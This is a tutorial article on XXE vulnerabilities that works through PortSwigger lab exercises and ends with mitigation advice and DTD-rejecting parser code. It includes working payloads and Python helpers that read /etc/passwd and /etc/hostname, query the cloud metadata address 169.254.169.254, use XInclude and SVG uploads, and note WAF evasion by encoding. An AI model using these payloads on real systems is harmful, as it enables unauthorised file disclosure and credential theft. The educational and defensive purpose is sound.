Understanding XXE Vulnerabilities

Scott Cosentino
8 min read · Mar 17, 2020

This article explains the fundamentals of XXE (XML external entity) vulnerabilities. Whenever a server parses XML data supplied by a user, there is a risk of XXE. The attack relies on a feature of XML known as external entities: custom entities whose values are loaded from outside the document in which they are declared. An attacker can therefore declare an entity that points to a file path or a URL, and a vulnerable server will attempt to retrieve that resource while parsing the document. If the retrieved value is reflected in the response, the attacker can read the contents of the targeted file or URL.

In this article, we will look at four XXE-based attacks:

1. XXE through form posts to retrieve files

2. XXE through form posts to perform SSRF attacks

3. XXE through the XInclude tag

4. XXE through SVG file upload

To demonstrate these attacks, I will use the labs available at https://portswigger.net/web-security/xxe. These labs are free to access after registering for an account. I will also use the Burp Suite tool from PortSwigger to intercept and modify requests. The video at the beginning of the article walks through these labs, so it is helpful if you want a visual step-by-step guide.

XXE To Retrieve Files

To start, we will look at using XXE to expose the /etc/passwd file from a target server. When we access the lab webpage, we will see several items that we can view the details of.

If we enter any item, there is an area where we can check the stock of the item at a given store. If we use Burp Suite to intercept the packets, we will see that the stock request is sent in XML format.

If we move this packet to the repeater using Action->Send To Repeater, we can experiment with this packet to try different inputs to find one that works. The format of the XML is easily seen through the XML tab on the packet.

From here, we can modify the XML data to add an external entity that requests the file we wish to target. First, I will show what the modified input looks like, and then explain how and why it works.

The content on line 2 is where we define the external entity that we want to reference. In this line, xxe is the name of the entity. The SYSTEM keyword tells the parser that the entity’s value comes from an external resource, which we give as a file path. Once this is defined, we replace the value of the productid parameter with a reference to the entity we declared (&xxe;). From here, we can send the request, and we will get the following results.

What happens is that the XML parser replaces the entity reference in productid with the contents of the external entity, which is the /etc/passwd file. The server then looks up a product whose ID equals the contents of /etc/passwd. Since this isn’t a valid product ID, it returns an error message that echoes the ID it attempted to use. Because that ID was the contents of the /etc/passwd file, the contents of the file are dumped to the screen.
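Since the modified request is shown only as a screenshot, here is a minimal Python sketch of what such a request body might look like. The element names stockCheck, productId, and storeId, the DOCTYPE name foo, and the store ID value are assumptions for illustration. Only the entity name xxe and the /etc/passwd target come from the description above.

```python
# Hypothetical request body for the stock check.
# Element names and the DOCTYPE name "foo" are assumed, not taken from the lab.
XXE_FILE_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>"""

if __name__ == "__main__":
    # Line 2 declares the external entity; the productId element references it.
    print(XXE_FILE_PAYLOAD)
```

In this sketch the declaration sits on line 2 and the reference &xxe; takes the place of the numeric product ID, which is the substitution the explanation above describes.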

The structure of XXE-based attacks will typically follow this exact format, with some simple variations to fit the scenario. The general steps to successfully conduct an XXE attack are:

1. Determine the XML data being sent to the server

2. Determine what parameter is being parsed by the server

3. Define an external entity pointing to a target file or URL

4. Set the parameter being parsed by the server equal to the external entity
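Steps 3 and 4 above can be sketched as a small Python helper. This is an illustrative sketch rather than a tool used in the labs: the function name inject_external_entity, the DOCTYPE name foo, and the element names in the usage example are all hypothetical. It works on the raw string because an XML library would escape the & in the entity reference.

```python
import re


def inject_external_entity(xml_body: str, element: str, target_uri: str,
                           entity: str = "xxe") -> str:
    """Declare an external entity and reference it from one element."""
    # Step 4: replace the element's current value with the entity reference.
    pattern = re.compile(
        rf"(<{re.escape(element)}>).*?(</{re.escape(element)}>)", re.DOTALL
    )
    body, count = pattern.subn(
        lambda m: f"{m.group(1)}&{entity};{m.group(2)}", xml_body, count=1
    )
    if count == 0:
        raise ValueError(f"element <{element}> not found in request body")

    # Step 3: declare the entity in a DOCTYPE placed before the root element,
    # after the XML declaration if the body has one.
    doctype = f'<!DOCTYPE foo [ <!ENTITY {entity} SYSTEM "{target_uri}"> ]>'
    declaration = re.match(r"\s*<\?xml[^>]*\?>", body)
    if declaration:
        end = declaration.end()
        return body[:end] + "\n" + doctype + "\n" + body[end:].lstrip()
    return doctype + "\n" + body


if __name__ == "__main__":
    original = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
    )
    print(inject_external_entity(original, "productId", "file:///etc/passwd"))
```

Steps 1 and 2 remain manual: you still need to capture the request and work out which parameter the server reflects before a helper like this is useful.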

XXE to perform SSRF attacks

An SSRF (server-side request forgery) attack lets an attacker cause the server to make HTTP requests on their behalf. The attacker can reach any URL the server can access, including URLs that they typically don’t have permission to access, which could potentially leak data.

Looking at the same example as before, when we send XML to check the store stock, we can specify a URL instead of a file to retrieve. The request would look as follows.

The only thing that changes in the request is that we specify a URL instead of a file on the system. When the response to the URL request is returned, we will see that it shows little information.

What this reveals to us is the next path segment in the URL, so we can now try querying http://169.254.169.254/latest next.

We can keep repeating this, appending each newly revealed path segment, until we reach the security data stored on the server.

Doing this will reveal the content of the URL.
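The walk described above can be sketched in Python as follows. This is a hedged illustration: the helper names ssrf_payload and extend_url and the XML element names are assumptions, and the starting URL http://169.254.169.254/ is inferred from the /latest URL mentioned above. The sketch only builds request bodies and does not send anything.

```python
def ssrf_payload(url: str) -> str:
    """Build a request body whose external entity points at a URL."""
    # Element names and the DOCTYPE name are assumed for illustration.
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{url}"> ]>\n'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    )


def extend_url(current_url: str, revealed_segment: str) -> str:
    """Append the path segment revealed by the previous error response."""
    return current_url.rstrip("/") + "/" + revealed_segment.strip("/")


if __name__ == "__main__":
    url = "http://169.254.169.254/"
    print(ssrf_payload(url))
    # The first response reveals "latest" as the next segment.
    url = extend_url(url, "latest")
    print(ssrf_payload(url))
```

Each further segment would come from the error message returned by the previous request, so the loop is driven by the server's responses rather than by a fixed list.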

From this, we can see that XXE attacks let us expose not only files but also server-accessible URLs. This means that almost all data accessible to the server is at risk of compromise if XXE vulnerabilities are present. With that in mind, it is important to understand a few more obscure ways to create XXE attack conditions.

XXE through the XInclude tag

Often, an attacker does not have full control over the XML data, but does control an input that the server places into it. In these cases, they can’t declare an entity ahead of the XML elements, which makes it appear impossible to conduct XXE attacks. However, it is often still possible to conduct an XXE attack with access to just a single parameter, using the XInclude feature of XML.

XInclude can be thought of as a way of including another document within an existing XML document. Using this feature, we can inject an XML element that pulls in an external resource directly, and use that to leak data from the server. In this situation, the data sent from the client includes only the parameter values, which the server then inserts into its own XML.

To set up the XInclude, we need to inject data into the product ID parameter. The payload will look like the one below.

Without all of the encoding, the payload is:

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

We start by declaring the XInclude namespace (xmlns:xi) so that the XML parser recognizes xi:include. From here, we set up the include using xi:include. Setting parse="text" tells the parser to treat the included resource as plain text rather than XML, and href points to the file or URL that we wish to pull information from. When the request is processed, the product ID contains the XInclude, which resolves to the contents of the /etc/passwd file. Like before, the server attempts to use this as a product ID and returns an error saying the product ID is not valid. In the error, the contents of the file are displayed.
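The encoding step mentioned above can be reproduced with Python's standard library. This is a small sketch that assumes the stock check is sent as an ordinary URL-encoded form with parameters named productId and storeId; those names and the helper build_form_body are hypothetical.

```python
from urllib.parse import parse_qs, urlencode

# The unencoded XInclude payload from the text above.
XINCLUDE_PAYLOAD = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)


def build_form_body(product_id: str, store_id: str = "1") -> str:
    """URL-encode the form fields; parameter names are assumed."""
    return urlencode({"productId": product_id, "storeId": store_id})


if __name__ == "__main__":
    body = build_form_body(XINCLUDE_PAYLOAD)
    print(body)
    # Decoding the body recovers the original payload unchanged.
    print(parse_qs(body)["productId"][0])
```

The encoding matters because characters such as <, &, and = would otherwise be misread as part of the form syntax rather than as the value of the parameter.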

Exploiting XXE using SVG Files

It’s important to note that not all XXE attacks rely on basic XML. XXE can also be found in XML-based file formats, such as SVG files. In this example, we will take a look at how we can leak data from a file using an SVG file.

In this example, we have a blog where we can post comments, and upload our own avatar to go with our comment. The avatar can be any file format, including SVG files.

SVG files are formatted and often parsed in the same way as a regular XML file. Because of this, we can add XXE code in the same way that we can in any other XML-based request. The following SVG file can print the contents of the /etc/hostname file to the avatar image.

We start off similarly to the other XXE examples; however, the way we get the contents of the file to output is different. Lines 3 and 4 are standard for most SVG files, and line 5 is where we actually print the content. On this line, we specify a text element, with a font size as well as a location. For the contents of the text element, we put a reference to the xxe entity, which holds the contents of /etc/hostname. When we upload this file, the resulting image has text that contains the contents of the /etc/hostname file.
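As a rough reconstruction of such a file, the Python sketch below writes an SVG with the layout described above: the entity declaration on line 2, the svg element on lines 3 and 4, and the text element on line 5. The dimensions, font size, coordinates, DOCTYPE name, and the helper write_avatar are assumptions chosen for illustration.

```python
from pathlib import Path

# Hypothetical SVG avatar; sizes and coordinates are illustrative values.
SVG_XXE = """<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<svg width="128px" height="128px" version="1.1"
     xmlns="http://www.w3.org/2000/svg">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
"""


def write_avatar(path: str) -> Path:
    """Write the SVG to disk so it can be uploaded as an avatar."""
    out = Path(path)
    out.write_text(SVG_XXE, encoding="utf-8")
    return out


if __name__ == "__main__":
    print(write_avatar("avatar.svg"))
```

If the server's image processor resolves external entities while rendering, the text element is drawn with the file contents in place of &xxe;.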

This demonstrates that we can carry out an XXE attack without sending a traditional XML request. SVG and any other file types built on XML can be vulnerable to this type of attack, so it is important to ensure they are parsed safely.

Mitigating XXE Attacks

Often administrators will attempt to use WAFs (web application firewalls) to prevent XXE; however, they are typically quite easy to bypass. Using an encoding like UTF-32 together with encryption can typically lower a WAF’s visibility into the traffic, meaning you can slip a payload by without being spotted. In addition, WAFs tend to have performance implications, so using one may not be optimal for your application.

Disabling document type definitions (DTDs) if they aren’t required is typically the preferred way to prevent XXE attacks. Every language and parser has a different way to do this, so you will need to do some research to determine how to disable the feature in your respective parser/language.
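As one possible illustration in Python, the sketch below rejects any document that contains a DOCTYPE before handing it to the regular parser. It uses the standard library's expat bindings. The names DTDForbidden and parse_untrusted are hypothetical, and this is only one way to approach the problem, not a complete defense for every parser or feature.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this as soon as it sees "<!DOCTYPE", before any
    # entity declarations inside the DTD are processed.
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_untrusted(xml_text: str) -> ET.Element:
    """Parse XML only if it declares no DTD."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)  # raises DTDForbidden on any DOCTYPE
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    print(parse_untrusted("<stockCheck><productId>1</productId></stockCheck>"))
    try:
        parse_untrusted(
            '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
            "<a>&xxe;</a>"
        )
    except DTDForbidden as err:
        print("rejected:", err)
```

Rejecting the DOCTYPE outright is stricter than disabling external entities alone, which suits applications that never need DTDs. XInclude is a separate feature and has to be left disabled or turned off in the parser as well.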

With this article, you should now have the knowledge to test and locate XXE vulnerabilities in your web applications.
